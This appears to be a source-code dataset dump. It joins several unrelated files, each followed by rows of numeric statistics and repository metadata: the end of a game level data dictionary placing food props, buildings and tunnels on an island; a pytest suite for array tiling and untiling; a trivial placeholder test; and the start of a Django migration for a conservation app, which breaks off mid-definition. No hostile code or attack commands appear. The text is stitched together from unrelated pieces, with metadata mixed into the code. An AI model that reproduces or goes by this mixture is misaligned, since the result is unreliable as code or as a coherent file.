'models/props/mangobasket'}},'1219967803.17akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-30.277, 65.309, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967803.53akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-7.38, 72.276, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967804.08akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-46.939, 58.076, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967825.34akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967825.34akelts0','Hpr': VBase3(-20.344, 0.0, 0.0),'Pos': Point3(-42.939, -70.378, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 1,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967835.67akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967835.67akelts0','Hpr': VBase3(-20.344, 0.0, 0.0),'Pos': Point3(31.29, 77.6, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 2,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967841.55akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967841.55akelts0','Hpr': VBase3(46.578, 0.0, 0.0),'Pos': Point3(61.242, -59.937, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 3,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967846.48akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967846.48akelts0','Hpr': VBase3(46.578, 0.0, 0.0),'Pos': Point3(-62.861, 59.68, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 4,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967941.09akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(16.0, -29.85, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisSize': '','VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967941.67akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(17.039, -66.826, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967943.19akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(64.274, -25.463, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967943.7akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(46.57, -42.266, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967944.26akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(41.863, -62.028, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967945.2akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(31.384, -11.744, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967946.76akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(77.044, -13.696, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967951.66akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.532, -43.87, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967952.39akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-6.199, -7.695, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967952.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-30.715, -23.562, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967953.48akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-62.772, -34.142, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967953.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-52.025, -10.807, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967955.66akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-21.554, -33.194, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisSize': '','VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967957.7akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.049, -58.385, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967959.91akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-33.308, -51.626, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1228348366.44akelts': {'Type': 'Island Game Area','File': 'port_royal_area_MurkyHollow','Hpr': Point3(0.0, 0.0, 0.0),'Instanced': False,'Minimap': False,'Objects': {'1235762221.72akelts': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(97.704, 1056.156, 98.293),'Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1228348366.44akelts','Pos': Point3(-456.179, 510.894, 93.701),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(553.883, 545.263, 4.592),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_are_cav_startingPlane'}},'1234560059.16akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-246.921, 0.0, 0.0),'Objects': {'1157477467.36dxschafe': {'Type': 'Locator Node','Name': 'portal_exterior_1','GridPos': Point3(85.737, 34.289, 4.673),'Hpr': VBase3(46.116, 0.0, 0.0),'Parent Uid': '1234560059.16akelts','Pos': Point3(0.683, 0.079, 0.081),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(85.397, 34.886, 4.592),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/tunnels/tunnelcap_cave_exterior'}},'1234560512.0akelts1': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-90.15, 0.0, 0.0),'Objects': {'1234560512.0akelts2': {'Type': 'Locator Node','Name': 'portal_connector_1','GridPos': Point3(70.501, -28.75, 9.969),'Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1234560512.0akelts1','Pos': Point3(95.197, 150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1234560512.0akelts3': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-29.073, 105.97, 9.095),'Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1234560512.0akelts1','Pos': Point3(8.658, 3.262, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(345.008, -12.056, 5.319),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_cave_left'}}},'Undockable': False,'VisSize': '','Visibility': 'Section','Visual': {'Model': 'models/islands/pizza_zero'}}},'Vis Table': {'mushroom': (['pepperoni', 'pineapple'], ['1219967825.34akelts', '1219967835.67akelts', '1219967841.55akelts', '1219967846.48akelts', '1234560512.0akelts1']),'pepperoni': (['sausage', 'mushroom'], ['1234560512.0akelts1']),'pineapple': (['sausage', 'mushroom'], ['1234560512.0akelts1']),'sausage': (['pepperoni', 'pineapple'], ['1234560512.0akelts1'])},'Node Links': [['1168748493.66joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1168748490.2joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1168748483.16joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1176744320.0dxschafe', '1176744576.0dxschafe0', 'Bi-directional'], ['1176744320.0dxschafe', '1176745216.0dxschafe', 'Bi-directional'], ['1176744320.0dxschafe', '1176745216.0dxschafe0', 'Bi-directional'], ['1176744320.0dxschafe', '1176755584.0dxschafe2', 'Bi-directional'], ['1176755712.0dxschafe', '1176744320.0dxschafe', 'Bi-directional'], ['1176744320.0dxschafe', '1176755712.0dxschafe0', 'Bi-directional']],'Layers': {'Collisions': ['1184008208.59kmuller', '1184016064.62kmuller', '1184013852.84kmuller', '1185822696.06kmuller', '1184006140.32kmuller', '1184002350.98kmuller', '1184007573.29kmuller', '1184021176.59kmuller', '1184005963.59kmuller', '1188324241.31akelts', '1184006537.34kmuller', '1184006605.81kmuller', '1187139568.33kmuller', '1188324186.98akelts', '1184006730.66kmuller', '1184007538.51kmuller', '1184006188.41kmuller', '1184021084.27kmuller', '1185824396.94kmuller', '1185824250.16kmuller', '1185823630.52kmuller', '1185823760.23kmuller', '1185824497.83kmuller', '1185824751.45kmuller', '1187739103.34akelts', '1188323993.34akelts', '1184016538.29kmuller', '1185822200.97kmuller', '1184016225.99kmuller', '1195241421.34akelts', '1195242796.08akelts', '1184020642.13kmuller', '1195237994.63akelts', '1184020756.88kmuller', '1184020833.4kmuller', '1185820992.97kmuller', '1185821053.83kmuller', '1184015068.54kmuller', '1184014935.82kmuller', '1185821432.88kmuller', '1185821701.86kmuller', '1195240137.55akelts', '1195241539.38akelts', '1195238422.3akelts', '1195238473.22akelts', '1185821453.17kmuller', '1184021269.96kmuller', '1185821310.89kmuller', '1185821165.59kmuller', '1185821199.36kmuller', '1185822035.98kmuller', '1184015806.59kmuller', '1185822059.48kmuller', '1185920461.76kmuller', '1194984449.66akelts', '1185824206.22kmuller', '1184003446.23kmuller', '1184003254.85kmuller', '1184003218.74kmuller', '1184002700.44kmuller', '1186705073.11kmuller', '1187658531.86akelts', '1186705214.3kmuller', '1185824927.28kmuller', '1184014204.54kmuller', '1184014152.84kmuller']},'ObjectIds': {'1150922126.8dzlu': '["Objects"]["1150922126.8dzlu"]','1155695180.13sdnaik': '["Objects"]["1150922126.8dzlu"]["Objects"]["1155695180.13sdnaik"]','1157477467.36dxschafe': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560059.16akelts"]["Objects"]["1157477467.36dxschafe"]','1160703177.58JB': '["Objects"]["1150922126.8dzlu"]["Objects"]["1160703177.58JB"]','1162575677.17Shochet': '["Objects"]["1150922126.8dzlu"]["Objects"]["1162575677.17Shochet"]','1168493928.34kmuller': '["Objects"]["1150922126.8dzlu"]["Objects"]["1168493928.34kmuller"]','1169577216.0dxschafe0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1169577216.0dxschafe0"]','1172542336.0jubutler8': '["Objects"]["1150922126.8dzlu"]["Objects"]["1172542336.0jubutler8"]','1178941184.0JB': '["Objects"]["1150922126.8dzlu"]["Objects"]["1178941184.0JB"]','1192581038.5akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1192581038.5akelts"]','1193359744.0dxschafe0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1193359744.0dxschafe0"]','1219967635.89akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967635.89akelts"]','1219967645.94akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967645.94akelts"]','1219967701.58akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967701.58akelts"]','1219967702.73akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967702.73akelts"]','1219967703.58akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967703.58akelts"]','1219967706.25akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967706.25akelts"]','1219967754.09akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967754.09akelts"]','1219967765.61akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967765.61akelts"]','1219967783.2akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967783.2akelts"]','1219967783.72akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967783.72akelts"]','1219967784.53akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967784.53akelts"]','1219967786.83akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967786.83akelts"]','1219967791.12akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967791.12akelts"]','1219967800.16akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967800.16akelts"]','1219967801.34akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967801.34akelts"]','1219967801.8akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967801.8akelts"]','1219967802.26akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967802.26akelts"]','1219967803.17akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967803.17akelts"]','1219967803.53akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967803.53akelts"]','1219967804.08akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967804.08akelts"]','1219967825.34akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967825.34akelts"]','1219967825.34akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967825.34akelts"]','1219967835.67akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967835.67akelts"]','1219967835.67akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967835.67akelts"]','1219967841.55akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967841.55akelts"]','1219967841.55akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967841.55akelts"]','1219967846.48akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967846.48akelts"]','1219967846.48akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967846.48akelts"]','1219967941.09akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967941.09akelts"]','1219967941.67akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967941.67akelts"]','1219967943.19akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967943.19akelts"]','1219967943.7akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967943.7akelts"]','1219967944.26akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967944.26akelts"]','1219967945.2akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967945.2akelts"]','1219967946.76akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967946.76akelts"]','1219967951.66akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967951.66akelts"]','1219967952.39akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967952.39akelts"]','1219967952.83akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967952.83akelts"]','1219967953.48akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967953.48akelts"]','1219967953.83akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967953.83akelts"]','1219967955.66akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967955.66akelts"]','1219967957.7akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967957.7akelts"]','1219967959.91akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967959.91akelts"]','1228348366.44akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1228348366.44akelts"]','1234560059.16akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560059.16akelts"]','1234560512.0akelts1': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]','1234560512.0akelts2': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]["Objects"]["1234560512.0akelts2"]','1234560512.0akelts3': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]["Objects"]["1234560512.0akelts3"]','1235762221.72akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1228348366.44akelts"]["Objects"]["1235762221.72akelts"]'}}
extraInfo = {'camPos': Point3(2225.62, -1352.79, 1400.6),'camHpr': VBase3(58.7196, -28.4208, -1.94155e-06),'focalLength': 1.39999997616,'skyState': -2,'fog': 0} | 7,834.333333 | 23,289 | 0.678637 | 3,055 | 23,503 | 5.201637 | 0.199018 | 0.023535 | 0.023787 | 0.017368 | 0.560254 | 0.457995 | 0.400541 | 0.392235 | 0.37581 | 0.374363 | 0 | 0.280449 | 0.04876 | 23,503 | 3 | 23,290 | 7,834.333333 | 0.430335 | 0 | 0 | 0 | 0 | 0 | 0.601515 | 0.236768 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ea87ff66485ca35341c38984e1491b8bfc5859e7 | 5,079 | py | Python | tests/test_tile.py | jhkennedy/asf-tools | f218cf80b98c4eb0e6f66e53244a15e198d49012 | [
"BSD-3-Clause"
] | 2 | 2021-06-17T13:25:15.000Z | 2021-12-01T08:19:05.000Z | tests/test_tile.py | jhkennedy/asf-tools | f218cf80b98c4eb0e6f66e53244a15e198d49012 | [
"BSD-3-Clause"
] | 23 | 2020-11-25T00:45:57.000Z | 2022-03-17T22:05:58.000Z | tests/test_tile.py | ASFHyP3/GIS-tools | 435a544bd6f3f4953679e5d891c0e454f7bdd471 | [
"BSD-3-Clause"
] | 4 | 2021-05-10T06:03:44.000Z | 2021-10-08T19:48:31.000Z | import numpy as np
import pytest
from asf_tools import tile
def test_tile_array():
a = np.array([[0, 0, 1, 1],
[0, 0, 1, 1],
[2, 2, 3, 3],
[2, 2, 3, 3]])
tiled = tile.tile_array(a, tile_shape=(2, 2))
assert tiled.shape == (4, 2, 2)
assert np.all(tiled[0, :, :] == np.array([[0, 0], [0, 0]]))
assert np.all(tiled[-1, :, :] == np.array([[3, 3], [3, 3]]))
with pytest.raises(ValueError):
tile.tile_array(a, tile_shape=(3, 3))
tiled = tile.tile_array(a, tile_shape=(3, 3), pad_value=4)
assert tiled.shape == (4, 3, 3)
assert np.all(tiled[0, :, :] == np.array([[0, 0, 1], [0, 0, 1], [2, 2, 3]]))
assert np.all(tiled[-1, :, :] == np.array([[3, 4, 4], [4, 4, 4], [4, 4, 4]]))
tiled = tile.tile_array(a, tile_shape=(2, 3), pad_value=4)
assert tiled.shape == (4, 2, 3)
assert np.all(tiled[0, :, :] == np.array([[0, 0, 1], [0, 0, 1]]))
assert np.all(tiled[-1, :, :] == np.array([[3, 4, 4], [3, 4, 4]]))
tiled = tile.tile_array(a, tile_shape=(3, 2), pad_value=4)
assert tiled.shape == (4, 3, 2)
assert np.all(tiled[0, :, :] == np.array([[0, 0], [0, 0], [2, 2]]))
assert np.all(tiled[-1, :, :] == np.array([[3, 3], [4, 4], [4, 4]]))
def test_tile_masked_array():
a = np.array([[0, 0, 1, 1],
[0, 0, 1, 1],
[2, 2, 3, 3],
[2, 2, 3, 3]])
with pytest.raises(AttributeError):
_ = tile.tile_array(a, tile_shape=(2, 2)).mask
m = np.array([[False, False, False, True],
[False, False, False, False],
[False, False, False, False],
[False, False, False, True]])
ma = np.ma.MaskedArray(a, mask=m)
tiled = tile.tile_array(ma, tile_shape=(2, 2))
assert tiled.shape == (4, 2, 2)
assert isinstance(tiled, np.ma.MaskedArray)
assert np.all(
tiled.mask == np.array([[[False, False],
[False, False]],
[[False, True],
[False, False]],
[[False, False],
[False, False]],
[[False, False],
[False, True]]])
)
tiled = tile.tile_array(ma, tile_shape=(3, 3), pad_value=4)
assert isinstance(tiled, np.ma.MaskedArray)
assert tiled.shape == (4, 3, 3)
assert np.all(np.ma.getdata(tiled[0, :, :]) == np.array([[0, 0, 1], [0, 0, 1], [2, 2, 3]]))
assert np.all(
tiled[0, :, :].mask == np.array([[False, False, False], [False, False, False], [False, False, False]])
)
assert np.all(np.ma.getdata(tiled[-1, :, :]) == np.array([[3, 4, 4], [4, 4, 4], [4, 4, 4]]))
assert np.all(
tiled[-1, :, :].mask == np.array([[True, True, True], [True, True, True], [True, True, True]])
)
def test_untile_array():
a = np.array([[0, 0, 1, 1, 2, 2],
[0, 0, 1, 1, 2, 2],
[3, 3, 4, 4, 5, 5],
[3, 3, 4, 4, 5, 5],
[6, 6, 7, 7, 8, 8],
[6, 6, 7, 7, 8, 8],
])
assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(2, 2)), array_shape=a.shape))
assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(4, 4), pad_value=9), array_shape=a.shape))
assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=a.shape))
assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(4, 2), pad_value=9), array_shape=a.shape))
with pytest.raises(ValueError):
tile.untile_array(tile.tile_array(a, tile_shape=(4, 4)), array_shape=(9, 9))
with pytest.raises(ValueError):
tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=(6, 9))
# array shape will subset some of the padding that was required to tile `a` with `tile_shape`
assert np.all(
np.pad(a, ((0, 0), (0, 2)), constant_values=9)
== tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=(6, 8))
)
def test_untile_masked_array():
a = np.array([[0, 0, 1, 1],
[0, 0, 1, 1],
[2, 2, 3, 3],
[2, 2, 3, 3]])
with pytest.raises(AttributeError):
_ = tile.untile_array(tile.tile_array(a, tile_shape=(2, 2)), array_shape=a.shape).mask
m = np.array([[False, False, False, True],
[False, False, False, False],
[False, False, False, False],
[False, False, False, True]])
ma = np.ma.MaskedArray(a, mask=m)
untiled = tile.untile_array(tile.tile_array(ma.copy(), tile_shape=(2, 2)), array_shape=a.shape)
assert np.all(ma == untiled)
assert np.all(ma.mask == untiled.mask)
untiled = tile.untile_array(tile.tile_array(ma.copy(), tile_shape=(3, 3), pad_value=4), array_shape=a.shape)
assert np.all(ma == untiled)
assert np.all(ma.mask == untiled.mask)
| 39.069231 | 114 | 0.510534 | 772 | 5,079 | 3.253886 | 0.073834 | 0.175159 | 0.220939 | 0.238854 | 0.903662 | 0.884156 | 0.873806 | 0.803344 | 0.711783 | 0.611465 | 0 | 0.066334 | 0.290608 | 5,079 | 129 | 115 | 39.372093 | 0.630863 | 0.017917 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.04 | false | 0 | 0.03 | 0 | 0.07 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ea90c69c9313f1c198ea4ac792fcc591e22e94f5 | 62 | py | Python | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | [
"MIT"
] | 5 | 2017-08-30T11:20:43.000Z | 2019-05-27T11:37:21.000Z | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | [
"MIT"
] | null | null | null | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | [
"MIT"
] | 2 | 2017-08-30T18:54:59.000Z | 2019-10-28T03:38:48.000Z | from swandns.modules import zonefile
def test_x():
pass
| 10.333333 | 36 | 0.725806 | 9 | 62 | 4.888889 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209677 | 62 | 5 | 37 | 12.4 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
57c2a4a3f7a9347b5e0a3a9daaf54216ede14b94 | 38,611 | py | Python | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | [
"MIT"
] | 3 | 2020-07-23T06:37:43.000Z | 2022-01-27T09:40:40.000Z | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | [
"MIT"
] | 337 | 2018-07-12T05:56:29.000Z | 2022-03-30T02:40:41.000Z | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | [
"MIT"
] | 2 | 2020-02-24T00:05:46.000Z | 2020-07-15T07:02:29.000Z | # Generated by Django 2.0.7 on 2018-07-31 05:45
import conservation.models
import django.db.models.deletion
import django_fsm
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
replaces = [('conservation', '0001_initial'), ('conservation', '0002_auto_20180404_1327'), ('conservation', '0003_auto_20180404_1512'), ('conservation', '0004_auto_20180404_1515'), ('conservation', '0005_auto_20180404_1532'), ('conservation', '0006_auto_20180405_0928'), ('conservation', '0007_auto_20180405_0934'), ('conservation', '0008_auto_20180405_1008'), ('conservation', '0009_auto_20180405_1009'), ('conservation', '0010_auto_20180405_1039'), ('conservation', '0011_auto_20180410_1504'), ('conservation', '0012_auto_20180411_1008'), ('conservation', '0013_auto_20180411_1314'), ('conservation', '0014_auto_20180411_1314'),
('conservation', '0015_auto_20180411_1324'), ('conservation', '0016_auto_20180411_1416'), ('conservation', '0017_auto_20180411_2121'), ('conservation', '0018_auto_20180411_2131'), ('conservation', '0019_auto_20180411_2204'), ('conservation', '0020_auto_20180413_2031'), ('conservation', '0021_auto_20180413_2122'), ('conservation', '0022_auto_20180413_2123'), ('conservation', '0023_auto_20180417_1650'), ('conservation', '0024_auto_20180420_1140'), ('conservation', '0025_conservationcategory_current'), ('conservation', '0026_document_last_reviewed_on'), ('conservation', '0027_auto_20180509_1048')]
initial = True
dependencies = [
('taxonomy', '0001_squashed_0078_auto_20180717_1601'),
('contenttypes', '0002_remove_content_type_name'),
#('taxonomy', '0040_auto_20180404_1113'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CommunityGazettal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_s5', models.BooleanField(db_index=True, default=False,
help_text='Whether this Gazettal includes Conservation Category S5 (Migratory Bird).', verbose_name='Cons Category S5')),
('is_m1', models.BooleanField(db_index=True, default=False,
help_text='Whether this Gazettal includes Conservation Category M1.', verbose_name='Cons Category M1')),
('is_m2', models.BooleanField(db_index=True, default=False,
help_text='Whether this Gazettal includes Conservation Category M2.', verbose_name='Cons Category M2')),
('is_m3', models.BooleanField(db_index=True, default=False,
help_text='Whether this Gazettal includes Conservation Category M3.', verbose_name='Cons Category M3')),
('is_m4', models.BooleanField(db_index=True, default=False,
help_text='Whether this Gazettal includes Conservation Category M4.', verbose_name='Cons Category M4')),
('status', django_fsm.FSMField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
